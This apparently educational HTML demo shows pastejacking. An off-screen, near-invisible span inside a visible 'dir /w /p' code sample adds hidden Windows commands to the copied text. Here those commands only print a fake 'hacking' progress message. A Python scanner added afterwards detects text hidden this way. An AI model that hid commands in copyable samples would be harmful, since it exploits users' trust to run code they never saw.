Example of how to lull a user into pasting potentially dangerous commands into their Windows command prompt by 'injecting' hidden code using CSS.
<!doctype html>
<html>
<head>
<title>Windows code sample 'hack'</title>
</head>
<body>
<h1>Code sample</h1>
<p>Copy and paste the below code sample into your command prompt to see your directory paged... And other stuff...</p>
<p>Inspiration taken from <a href="http://lifepluslinux.blogspot.com.au/2017/01/look-before-you-paste-from-website-to.html">Suresh Alse</a>. For a little more information, see my <a href="https://danatkinson.github.io/2017/01/26/How-to-hack-a-trusting-developer-s-machine/" title="How to hack a trusting Windows developer's machine">blog post</a> at danatkinson.github.io.</p>
<code style="background-color:#eeeeee;padding:10px;">
<span>dir</span>
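<!-- Here it is: this span is positioned off-screen, so it is never seen, but its text is still part of the selection and ends up on the clipboard -->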
<span style="color:#F3F5F6;position:absolute;left:-100px;top:-100px;height:0px;z-index:-100;display:inline-block;">&amp;
cls &amp; echo Haha! You gave me access to your computer! &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ## (10%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ### (20%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ##### (33%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ####### (40%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ########## (50%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ############# (66%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ##################### (99%) &amp;
ping 127.0.0.1 -n 2 &gt; nul &amp;
cls &amp; echo h4cking ####################### (100%) &amp;
cls &amp; echo Hacking complete. &amp;
echo Use GUI interface using visual basic to track my IP &amp;
ping 127.0.0.1 -n 5 &gt; nul &amp;
cls
<br>dir
</span>
<span>/w /p<br>
</span>
</code>
</body>
</html>
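
A defender-side check for the trick shown above, as an added example that is not part of the original gist: it parses a page and separates the text inside `<code>`/`<pre>` that a reader can see from the text an inline style keeps out of view. The names `HIDING`, `HiddenTextScanner` and `scan`, the style heuristics, and the `SAMPLE` markup are assumptions constructed for this illustration; styles set in external stylesheets are not examined.

```python
import re
from html.parser import HTMLParser

# Inline-style heuristics (assumed for this example, not exhaustive) for text
# that stays in a copied selection while being kept out of the reader's view.
HIDING = [re.compile(p, re.I) for p in (
    r"(?<![\w-])(?:left|top)\s*:\s*-\d",                       # moved off-screen
    r"(?<![\w-])(?:height|width|font-size)\s*:\s*0(?![.\d])",  # collapsed to zero
    r"(?<![\w-])opacity\s*:\s*0(?![.\d]*[1-9])",               # fully transparent
)]
VOID = {"br", "hr", "img", "input", "meta", "link", "wbr"}  # never closed

class HiddenTextScanner(HTMLParser):
    """Split text found under <code>/<pre> into visible and hidden parts."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.stack = []                     # (tag, hidden?) per open element
        self.visible, self.hidden = [], []

    def handle_starttag(self, tag, attrs):
        if tag in VOID:
            return
        style = dict(attrs).get("style") or ""
        inherited = bool(self.stack) and self.stack[-1][1]
        self.stack.append((tag, inherited or any(p.search(style) for p in HIDING)))

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):   # close nearest match
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        in_sample = any(t in ("code", "pre") for t, _ in self.stack)
        if in_sample and data.strip():
            bucket = self.hidden if self.stack[-1][1] else self.visible
            bucket.append(" ".join(data.split()))

def scan(html):
    scanner = HiddenTextScanner()
    scanner.feed(html)
    scanner.close()
    return {"visible": scanner.visible, "hidden": scanner.hidden}

# Constructed sample modelled on the markup above, with a harmless hidden part.
SAMPLE = """<code style="padding:10px;"><span>dir</span>
<span style="position:absolute;left:-100px;top:-100px;height:0px;">&amp; echo hidden text &amp;</span>
<span>/w /p</span></code>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Any non-empty `hidden` list means the clipboard contents will differ from what the page displays, which is the condition to flag before a code sample is pasted into a shell.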